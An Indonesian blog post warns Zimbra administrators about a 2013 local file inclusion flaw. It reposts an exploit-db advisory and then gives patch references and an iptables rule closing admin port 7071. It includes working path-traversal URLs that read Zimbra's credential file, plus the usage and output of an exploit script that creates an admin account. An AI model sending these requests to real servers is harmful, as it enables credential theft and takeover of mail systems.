Zimbra 0day exploit / Privilege escalation via LFI

Assalamualaikum Wr Wb

Sekedar mengingat kan bagi teman" yang kantor/tempat kerja memakai mail server zimbra.

0day Exploit Zimbra :

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical



# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


----------------Exploit-----------------


Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.

use the exploit like this :


ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
    [*] Account   : someuser@example.com
    [*] Password  : Test123_23
[+] Successfully Exploited !

The number of servers vuln are huge like 80/100.

This is only for educational purpouses.


sumber : http://www.exploit-db.com/exploits/30085/

Manual Patchnya bisa di liat disini panduan dan informasinya seperti yang di posting mas vavai di milist Id Zimbra :

A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
Also, a notification was included in these Release Notes:

* 8.0.2 Patch 1: http://files2.zimbra.com/website/docs/8.0/ZCS_Patch_8_0_2_r1.pdf
o February 19, 2013: Patch 8.0.2 P1 patch fixes the following bug: Bug 80338 Security Fix
* 7.2.2 Patch 2: http://files2.zimbra.com/website/docs/7.2/ZCS_Patch_7_2_2_r1.pdf
o February 19, 2013: Patch 7.2.2 P2 patch fixes the following bug: Bug 80338 Security Fix

atau bisa close port 7071 admin zimbra di sisi firewall/iptables nya :

iptables -A INPUT -m state --state NEW -p tcp -m tcp --dport 7071  -j DROP



Wassalamu alaikum semoga menjadi pembelajaran

Tweet